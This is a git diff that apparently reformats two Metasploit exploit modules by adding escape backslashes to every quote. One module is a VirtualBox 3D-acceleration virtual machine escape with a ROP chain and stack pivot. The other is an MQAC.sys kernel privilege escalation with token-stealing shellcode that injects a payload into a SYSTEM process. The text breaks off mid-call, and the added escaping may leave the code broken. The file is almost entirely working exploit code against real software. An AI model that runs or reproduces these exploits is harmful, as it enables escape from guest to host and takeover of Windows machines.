023a6b2af..f78c99163 100755 --- a/platforms/win_x86-64/remote/34334.rb +++ b/platforms/win_x86-64/remote/34334.rb @@ -3,13 +3,13 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' -require 'rex' +require \'msf/core\' +require \'rex\' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking - DEVICE = '\\\\.\\VBoxGuest' + DEVICE = \'\\\\\\\\.\\\\VBoxGuest\' INVALID_HANDLE_VALUE = 0xFFFFFFFF # VBOX HGCM protocol constants @@ -36,59 +36,59 @@ class Metasploit3 < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'VirtualBox 3D Acceleration Virtual Machine Escape', - 'Description' => %q{ + \'Name\' => \'VirtualBox 3D Acceleration Virtual Machine Escape\', + \'Description\' => %q{ This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a sequence of specially crafted of rendering messages, a virtual machine can exploit an out of bounds array access to corrupt memory and escape to the host. This module has been tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6. }, - 'License' => MSF_LICENSE, - 'Author' => + \'License\' => MSF_LICENSE, + \'Author\' => [ - 'Francisco Falcon', # Vulnerability Discovery and PoC - 'Florian Ledoux', # Win 8 64 bits exploitation analysis - 'juan vazquez' # MSF module + \'Francisco Falcon\', # Vulnerability Discovery and PoC + \'Florian Ledoux\', # Win 8 64 bits exploitation analysis + \'juan vazquez\' # MSF module ], - 'Arch' => ARCH_X86_64, - 'Platform' => 'win', - 'SessionTypes' => ['meterpreter'], - 'DefaultOptions' => + \'Arch\' => ARCH_X86_64, + \'Platform\' => \'win\', + \'SessionTypes\' => [\'meterpreter\'], + \'DefaultOptions\' => { - 'EXITFUNC' => 'thread' + \'EXITFUNC\' => \'thread\' }, - 'Targets' => + \'Targets\' => [ - [ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)', + [ \'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)\', { :messages => :target_virtualbox_436_win7_64 } ] ], - 'Payload' => + \'Payload\' => { - 'Space' => 7000, - 'DisableNops' => true + \'Space\' => 7000, + \'DisableNops\' => true }, - 'References' => + \'References\' => [ - ['CVE', '2014-0983'], - ['BID', '66133'], - ['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'], - ['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration'], - ['URL', 'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php'] + [\'CVE\', \'2014-0983\'], + [\'BID\', \'66133\'], + [\'URL\', \'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities\'], + [\'URL\', \'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration\'], + [\'URL\', \'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php\'] ], - 'DisclosureDate' => 'Mar 11 2014', - 'DefaultTarget' => 0 + \'DisclosureDate\' => \'Mar 11 2014\', + \'DefaultTarget\' => 0 })) end def open_device - r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", 0, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0) + r = session.railgun.kernel32.CreateFileA(DEVICE, \"GENERIC_READ | GENERIC_WRITE\", 0, nil, \"OPEN_EXISTING\", \"FILE_ATTRIBUTE_NORMAL\", 0) - handle = r['return'] + handle = r[\'return\'] if handle == INVALID_HANDLE_VALUE return nil @@ -98,25 +98,25 @@ class Metasploit3 < Msf::Exploit::Local end def send_ioctl(ioctl, msg) - result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "") + result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, \"\") - if result["GetLastError"] != 0 - unless result["ErrorMessage"].blank? - vprint_error("#{result["ErrorMessage"]}") + if result[\"GetLastError\"] != 0 + unless result[\"ErrorMessage\"].blank? + vprint_error(\"#{result[\"ErrorMessage\"]}\") end return nil end - unless result["lpBytesReturned"] && result["lpBytesReturned"] == msg.length - unless result["ErrorMessage"].blank? - vprint_error("#{result["ErrorMessage"]}") + unless result[\"lpBytesReturned\"] && result[\"lpBytesReturned\"] == msg.length + unless result[\"ErrorMessage\"].blank? + vprint_error(\"#{result[\"ErrorMessage\"]}\") end return nil end - unless result["lpOutBuffer"] && result["lpOutBuffer"].unpack("V").first == 0 - unless result["ErrorMessage"].blank? - vprint_error("#{result["ErrorMessage"]}") + unless result[\"lpOutBuffer\"] && result[\"lpOutBuffer\"].unpack(\"V\").first == 0 + unless result[\"ErrorMessage\"].blank? + vprint_error(\"#{result[\"ErrorMessage\"]}\") end return nil end @@ -125,10 +125,10 @@ class Metasploit3 < Msf::Exploit::Local end def connect - msg = "\x00" * CONNECT_MSG_SIZE + msg = \"\\x00\" * CONNECT_MSG_SIZE - msg[4, 4] = [2].pack("V") - msg[8, "VBoxSharedCrOpenGL".length] = "VBoxSharedCrOpenGL" + msg[4, 4] = [2].pack(\"V\") + msg[8, \"VBoxSharedCrOpenGL\".length] = \"VBoxSharedCrOpenGL\" result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CONNECT, msg) @@ -136,15 +136,15 @@ class Metasploit3 < Msf::Exploit::Local return result end - client_id = result["lpOutBuffer"][136, 4].unpack("V").first + client_id = result[\"lpOutBuffer\"][136, 4].unpack(\"V\").first client_id end def disconnect - msg = "\x00" * DISCONNECT_MSG_SIZE + msg = \"\\x00\" * DISCONNECT_MSG_SIZE - msg[4, 4] = [@client_id].pack("V") + msg[4, 4] = [@client_id].pack(\"V\") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_DISCONNECT, msg) @@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Local end def set_pid(pid) - msg = "\x00" * SET_PID_MSG_SIZE + msg = \"\\x00\" * SET_PID_MSG_SIZE - msg[0, 4] = [VERR_WRONG_ORDER].pack("V") - msg[4, 4] = [@client_id].pack("V") # u32ClientID - msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack("V") - msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack("V") - msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack("V") - msg[20, 4] = [pid].pack("V") + msg[0, 4] = [VERR_WRONG_ORDER].pack(\"V\") + msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID + msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack(\"V\") + msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack(\"V\") + msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack(\"V\") + msg[20, 4] = [pid].pack(\"V\") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) @@ -167,16 +167,16 @@ class Metasploit3 < Msf::Exploit::Local end def set_version - msg = "\x00" * SET_VERSION_MSG_SIZE + msg = \"\\x00\" * SET_VERSION_MSG_SIZE - msg[0, 4] = [VERR_WRONG_ORDER].pack("V") - msg[4, 4] = [@client_id].pack("V") # u32ClientID - msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack("V") - msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V") - msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") - msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V") - msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") - msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V") + msg[0, 4] = [VERR_WRONG_ORDER].pack(\"V\") + msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID + msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack(\"V\") + msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack(\"V\") + msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\") + msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack(\"V\") + msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\") + msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack(\"V\") result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) @@ -184,16 +184,16 @@ class Metasploit3 < Msf::Exploit::Local end def trigger(buff_addr, buff_length) - msg = "\x00" * CALL_EA_MSG_SIZE + msg = \"\\x00\" * CALL_EA_MSG_SIZE - msg[4, 4] = [@client_id].pack("V") # u32ClientID - msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack("V") - msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack("V") - msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") - msg[20, 4] = [@client_id].pack("V") # u32ClientID - msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack("V") - msg[32, 4] = [buff_length].pack("V") # size_of(buf) - msg[36, 4] = [buff_addr].pack("V") # (buf) + msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID + msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack(\"V\") + msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack(\"V\") + msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\") + msg[20, 4] = [@client_id].pack(\"V\") # u32ClientID + msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack(\"V\") + msg[32, 4] = [buff_length].pack(\"V\") # size_of(buf) + msg[36, 4] = [buff_addr].pack(\"V\") # (buf) result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) @@ -201,9 +201,9 @@ class Metasploit3 < Msf::Exploit::Local end def stack_adjustment - pivot = "\x65\x8b\x04\x25\x10\x00\x00\x00" # "mov eax,dword ptr gs:[10h]" # Get Stack Bottom from TEB - pivot << "\x89\xc4" # mov esp, eax # Store stack bottom in esp - pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # Plus a little offset... + pivot = \"\\x65\\x8b\\x04\\x25\\x10\\x00\\x00\\x00\" # \"mov eax,dword ptr gs:[10h]\" # Get Stack Bottom from TEB + pivot << \"\\x89\\xc4\" # mov esp, eax # Store stack bottom in esp + pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # Plus a little offset... pivot end @@ -222,30 +222,30 @@ class Metasploit3 < Msf::Exploit::Local # See at the end of the module for a better description of the ROP Chain, # or even better, read: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php # All gadgets from VBoxREM.dll - opcodes_data = [0x8, 0x30, 0x331].pack("V*") + opcodes_data = [0x8, 0x30, 0x331].pack(\"V*\") - opcodes_data << [0x6a68599a].pack("Q<") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret - opcodes_data << [112].pack("Q<") # RDX - opcodes_data << [0x6a70a560].pack("Q<") # Gadget 3 # lea rax,[rsp+8] # ret - opcodes_data << [0x6a692b1c].pack("Q<") # Gadget 4 # lea rax,[rdx+rax] # ret - opcodes_data << [0x6a6931d6].pack("Q<") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret - opcodes_data << [0x6a68124e].pack("Q<") # Gadget 6 # pop r12 # ret - opcodes_data << [0x6A70E822].pack("Q<") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect) - opcodes_data << [0x6a70927d].pack("Q<") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp + opcodes_data << [0x6a68599a].pack(\"Q<\") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret + opcodes_data << [112].pack(\"Q<\") # RDX + opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 3 # lea rax,[rsp+8] # ret + opcodes_data << [0x6a692b1c].pack(\"Q<\") # Gadget 4 # lea rax,[rdx+rax] # ret + opcodes_data << [0x6a6931d6].pack(\"Q<\") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret + opcodes_data << [0x6a68124e].pack(\"Q<\") # Gadget 6 # pop r12 # ret + opcodes_data << [0x6A70E822].pack(\"Q<\") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect) + opcodes_data << [0x6a70927d].pack(\"Q<\") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp opcodes_data << Rex::Text.pattern_create(80) - opcodes_data << [0].pack("Q<") # 1st arg (lpAddress) # chain will store stack address here + opcodes_data << [0].pack(\"Q<\") # 1st arg (lpAddress) # chain will store stack address here opcodes_data << Rex::Text.pattern_create(104 - 80 - 8) - opcodes_data << [0x2000].pack("Q<") # 2nd arg (dwSize) + opcodes_data << [0x2000].pack(\"Q<\") # 2nd arg (dwSize) opcodes_data << Rex::Text.pattern_create(140 - 104 - 8) - opcodes_data << [0x40].pack("V") # 3rd arg (flNewProtect) + opcodes_data << [0x40].pack(\"V\") # 3rd arg (flNewProtect) opcodes_data << Rex::Text.pattern_create(252 - 4 - 140 - 64) - opcodes_data << [0x6A70BB20].pack("V") # ptr to jmp VirtualProtect instr. - opcodes_data << "A" * 8 - opcodes_data << [0x6a70a560].pack("Q<") # Gadget 9 - opcodes_data << [0x6a6c9d3d].pack("Q<") # Gadget 10 - opcodes_data << "\xe9\x5b\x02\x00\x00" # jmp $+608 - opcodes_data << "A" * (624 - 24 - 5) - opcodes_data << [0x6a682a2a].pack("Q<") # Gadget 1 # xchg eax, esp # ret # stack pivot + opcodes_data << [0x6A70BB20].pack(\"V\") # ptr to jmp VirtualProtect instr. + opcodes_data << \"A\" * 8 + opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 9 + opcodes_data << [0x6a6c9d3d].pack(\"Q<\") # Gadget 10 + opcodes_data << \"\\xe9\\x5b\\x02\\x00\\x00\" # jmp $+608 + opcodes_data << \"A\" * (624 - 24 - 5) + opcodes_data << [0x6a682a2a].pack(\"Q<\") # Gadget 1 # xchg eax, esp # ret # stack pivot opcodes_data << stack_adjustment opcodes_data << payload.encoded opcodes_data << Rex::Text.pattern_create(8196 - opcodes_data.length) @@ -256,11 +256,11 @@ class Metasploit3 < Msf::Exploit::Local # not reused until the second packet arrives. The second packet, # of course, must have 8196 bytes length too. So this memory is # reused and code execution can be accomplished. - opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack("V*") - opcodes_data << "B" * (8196 - opcodes_data.length) + opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack(\"V*\") + opcodes_data << \"B\" * (8196 - opcodes_data.length) end - msg = opcodes_hdr.pack("V*") + opcodes.pack("C*") + opcodes_data + msg = opcodes_hdr.pack(\"V*\") + opcodes.pack(\"C*\") + opcodes_data msg end @@ -287,53 +287,53 @@ class Metasploit3 < Msf::Exploit::Local def exploit unless self.respond_to?(target[:messages]) - print_error("Invalid target specified: no messages callback function defined") + print_error(\"Invalid target specified: no messages callback function defined\") return end - print_status("Opening device...") + print_status(\"Opening device...\") @handle = open_device if @handle.nil? - fail_with(Failure::NoTarget, "#{DEVICE} device not found") + fail_with(Failure::NoTarget, \"#{DEVICE} device not found\") else - print_good("#{DEVICE} found, exploiting...") + print_good(\"#{DEVICE} found, exploiting...\") end - print_status("Connecting to the service...") + print_status(\"Connecting to the service...\") @client_id = connect if @client_id.nil? - fail_with(Failure::Unknown, "Connect operation failed") + fail_with(Failure::Unknown, \"Connect operation failed\") end - print_good("Client ID #{@client_id}") + print_good(\"Client ID #{@client_id}\") - print_status("Calling SET_VERSION...") + print_status(\"Calling SET_VERSION...\") result = set_version if result.nil? - fail_with(Failure::Unknown, "Failed to SET_VERSION") + fail_with(Failure::Unknown, \"Failed to SET_VERSION\") end this_pid = session.sys.process.getpid - print_status("Calling SET_PID...") + print_status(\"Calling SET_PID...\") result = set_pid(this_pid) if result.nil? - fail_with(Failure::Unknown, "Failed to SET_PID") + fail_with(Failure::Unknown, \"Failed to SET_PID\") end this_proc = session.sys.process.open - print_status("Sending First 0xEA Opcode Message to control head_spu...") + print_status(\"Sending First 0xEA Opcode Message to control head_spu...\") result = send_opcodes_msg(this_proc, 1) if result.nil? - fail_with(Failure::Unknown, "Failed to control heap_spu...") + fail_with(Failure::Unknown, \"Failed to control heap_spu...\") end - print_status("Sending Second 0xEA Opcode Message to execute payload...") + print_status(\"Sending Second 0xEA Opcode Message to execute payload...\") @old_timeout = session.response_timeout session.response_timeout = 5 begin send_opcodes_msg(this_proc, 2) rescue Rex::TimeoutError - vprint_status("Expected timeout in case of successful exploitation") + vprint_status(\"Expected timeout in case of successful exploitation\") end end @@ -348,12 +348,12 @@ class Metasploit3 < Msf::Exploit::Local end unless @client_id.nil? - print_status("Disconnecting from the service...") + print_status(\"Disconnecting from the service...\") disconnect end unless @handle.nil? - print_status("Closing the device...") + print_status(\"Closing the device...\") session.railgun.kernel32.CloseHandle(@handle) end end diff --git a/platforms/win_x86/local/34167.rb b/platforms/win_x86/local/34167.rb index 8a86a5c8b..ca641fb43 100755 --- a/platforms/win_x86/local/34167.rb +++ b/platforms/win_x86/local/34167.rb @@ -3,8 +3,8 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' -require 'rex' +require \'msf/core\' +require \'rex\' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking @@ -14,64 +14,64 @@ class Metasploit3 < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation', - 'Description' => %q{ + \'Name\' => \'MQAC.sys Arbitrary Write Privilege Escalation\', + \'Description\' => %q{ A vulnerability within the MQAC.sys module allows an attacker to overwrite an arbitrary location in kernel memory. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process. }, - 'License' => MSF_LICENSE, - 'Author' => + \'License\' => MSF_LICENSE, + \'Author\' => [ - 'Matt Bergin', # original exploit and all the hard work - 'Spencer McIntyre' # MSF module + \'Matt Bergin\', # original exploit and all the hard work + \'Spencer McIntyre\' # MSF module ], - 'Arch' => [ ARCH_X86 ], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ], - 'DefaultOptions' => + \'Arch\' => [ ARCH_X86 ], + \'Platform\' => [ \'win\' ], + \'SessionTypes\' => [ \'meterpreter\' ], + \'DefaultOptions\' => { - 'EXITFUNC' => 'thread', + \'EXITFUNC\' => \'thread\', }, - 'Targets' => + \'Targets\' => [ - [ 'Windows XP SP3', + [ \'Windows XP SP3\', { - '_KPROCESS' => "\x44", - '_TOKEN' => "\xc8", - '_UPID' => "\x84", - '_APLINKS' => "\x88" + \'_KPROCESS\' => \"\\x44\", + \'_TOKEN\' => \"\\xc8\", + \'_UPID\' => \"\\x84\", + \'_APLINKS\' => \"\\x88\" } ], ], - 'References' => + \'References\' => [ - [ 'CVE', '2014-4971' ], - [ 'EDB', '34112' ], - [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ] + [ \'CVE\', \'2014-4971\' ], + [ \'EDB\', \'34112\' ], + [ \'URL\', \'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\' ] ], - 'DisclosureDate'=> 'Jul 22 2014', - 'DefaultTarget' => 0 + \'DisclosureDate\'=> \'Jul 22 2014\', + \'DefaultTarget\' => 0 })) end def find_sys_base(drvname) - session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') - session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]]) - session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]]) + session.railgun.add_dll(\'psapi\') if not session.railgun.dlls.keys.include?(\'psapi\') + session.railgun.add_function(\'psapi\', \'EnumDeviceDrivers\', \'BOOL\', [ [\"PBLOB\", \"lpImageBase\", \"out\"], [\"DWORD\", \"cb\", \"in\"], [\"PDWORD\", \"lpcbNeeded\", \"out\"]]) + session.railgun.add_function(\'psapi\', \'GetDeviceDriverBaseNameA\', \'DWORD\', [ [\"LPVOID\", \"ImageBase\", \"in\"], [\"PBLOB\", \"lpBaseName\", \"out\"], [\"DWORD\", \"nSize\", \"in\"]]) results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4) - addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*") + addresses = results[\'lpImageBase\'][0..results[\'lpcbNeeded\'] - 1].unpack(\"L*\") addresses.each do |address| results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48) - current_drvname = results['lpBaseName'][0..results['return'] - 1] + current_drvname = results[\'lpBaseName\'][0..results[\'return\'] - 1] if drvname == nil - if current_drvname.downcase.include?('krnl') + if current_drvname.downcase.include?(\'krnl\') return [address, current_drvname] end - elsif drvname == results['lpBaseName'][0..results['return'] - 1] + elsif drvname == results[\'lpBaseName\'][0..results[\'return\'] - 1] return [address, current_drvname] end end @@ -80,29 +80,29 @@ class Metasploit3 < Msf::Exploit::Local # Function borrowed from smart_hashdump def get_system_proc # Make sure you got the correct SYSTEM Account Name no matter the OS Language - local_sys = resolve_sid("S-1-5-18") - system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}" + local_sys = resolve_sid(\"S-1-5-18\") + system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\" this_pid = session.sys.process.getpid # Processes that can Blue Screen a host if migrated in to - dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"] + dangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"] session.sys.process.processes.each do |p| # Check we are not migrating to a process that can BSOD the host - next if dangerous_processes.include?(p["name"]) - next if p["pid"] == this_pid - next if p["pid"] == 4 - next if p["user"] != system_account_name + next if dangerous_processes.include?(p[\"name\"]) + next if p[\"pid\"] == this_pid + next if p[\"pid\"] == 4 + next if p[\"user\"] != system_account_name return p end end def open_device - handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil) - if handle['return'] == 0 - print_error('Failed to open the \\\\.\\MQAC device') + handle = session.railgun.kernel32.CreateFileA(\"\\\\\\\\.\\\\MQAC\", \"FILE_SHARE_WRITE|FILE_SHARE_READ\", 0, nil, \"OPEN_EXISTING\", 0, nil) + if handle[\'return\'] == 0 + print_error(\'Failed to open the \\\\\\\\.\\\\MQAC device\') return nil end - handle = handle['return'] + handle = handle[\'return\'] end def check @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Local end session.railgun.kernel32.CloseHandle(handle) - os = sysinfo["OS"] + os = sysinfo[\"OS\"] case os when /windows xp.*service pack 3/i return Exploit::CheckCode::Appears @@ -124,79 +124,79 @@ class Metasploit3 < Msf::Exploit::Local end def exploit - if sysinfo["Architecture"] =~ /wow64/i - print_error("Running against WOW64 is not supported") + if sysinfo[\"Architecture\"] =~ /wow64/i + print_error(\"Running against WOW64 is not supported\") return - elsif sysinfo["Architecture"] =~ /x64/ - print_error("Running against 64-bit systems is not supported") + elsif sysinfo[\"Architecture\"] =~ /x64/ + print_error(\"Running against 64-bit systems is not supported\") return end if is_system? - print_error("This meterpreter session is already running as SYSTEM") + print_error(\"This meterpreter session is already running as SYSTEM\") return end kernel_info = find_sys_base(nil) base_addr = 0xffff - print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}") + print_status(\"Kernel Base Address: 0x#{kernel_info[0].to_s(16)}\") handle = open_device return if handle.nil? this_proc = session.sys.process.open unless this_proc.memory.writable?(base_addr) - session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE") + session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack(\"L\"), nil, [ 0xffff ].pack(\"L\"), \"MEM_COMMIT|MEM_RESERVE\", \"PAGE_EXECUTE_READWRITE\") end unless this_proc.memory.writable?(base_addr) - print_error('Failed to properly allocate memory') + print_error(\'Failed to properly allocate memory\') this_proc.close return end hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) - hKernel = hKernel['return'] - halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable") - halDispatchTable = halDispatchTable['return'] + hKernel = hKernel[\'return\'] + halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, \"HalDispatchTable\") + halDispatchTable = halDispatchTable[\'return\'] halDispatchTable -= hKernel halDispatchTable += kernel_info[0] - print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}") + print_status(\"HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}\") - tokenstealing = "\x52" # push edx # Save edx on the stack - tokenstealing << "\x53" # push ebx # Save ebx on the stack - tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0 - tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD - tokenstealing << "\x8b\x40" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS - tokenstealing << "\x8b\xc8" # mov ecx, eax - tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN - tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks - tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks - tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP) - tokenstealing << "\x75\xe8" # jne 0000101e ====================== - tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX - tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX - tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS - tokenstealing << "\x5b" # pop ebx # Restores ebx - tokenstealing << "\x5a" # pop edx # Restores edx - tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel! + tokenstealing = \"\\x52\" # push edx # Save edx on the stack + tokenstealing << \"\\x53\" # push ebx # Save ebx on the stack + tokenstealing << \"\\x33\\xc0\" # xor eax, eax # eax = 0 + tokenstealing << \"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD + tokenstealing << \"\\x8b\\x40\" + target[\'_KPROCESS\'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS + tokenstealing << \"\\x8b\\xc8\" # mov ecx, eax + tokenstealing << \"\\x8b\\x98\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN + tokenstealing << \"\\x8b\\x80\" + target[\'_APLINKS\'] + \"\\x00\\x00\\x00\" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks + tokenstealing << \"\\x81\\xe8\" + target[\'_APLINKS\'] + \"\\x00\\x00\\x00\" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks + tokenstealing << \"\\x81\\xb8\" + target[\'_UPID\'] + \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP) + tokenstealing << \"\\x75\\xe8\" # jne 0000101e ====================== + tokenstealing << \"\\x8b\\x90\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX + tokenstealing << \"\\x8b\\xc1\" # mov eax, ecx # Retrieves KPROCESS stored on ECX + tokenstealing << \"\\x89\\x90\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS + tokenstealing << \"\\x5b\" # pop ebx # Restores ebx + tokenstealing << \"\\x5a\" # pop edx # Restores edx + tokenstealing << \"\\xc2\\x10\" # ret 10h # Away from the kernel! shellcode = make_nops(0x200) + tokenstealing this_proc.memory.write(0x1, shellcode) this_proc.close - print_status("Triggering vulnerable IOCTL") + print_status(\"Triggering vulnerable IOCTL\") session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) unless is_system? - print_error("Exploit failed") + print_error(\"Exploit failed\") return end proc = get_system_proc - print_status("Injecting the payload into SYSTEM process: #{proc['name']}") - unless execute_shellcode(payload.encoded, 